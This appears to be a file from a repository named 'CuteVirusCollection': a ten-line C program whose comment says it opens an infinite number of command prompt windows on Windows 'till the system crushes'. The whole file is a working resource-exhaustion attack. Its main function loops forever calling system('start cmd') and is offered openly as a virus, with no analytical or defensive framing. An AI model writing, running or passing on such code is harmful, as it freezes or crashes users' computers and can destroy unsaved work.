Files
CuteVirusCollection/cmd_blast.c

10 lines
185 B
C

// Opens an infinite number of command prompt window till the system crushes. Works on Windows OS only.
#include <stdlib.h>
main(){
while(1){
system("start cmd");
}
}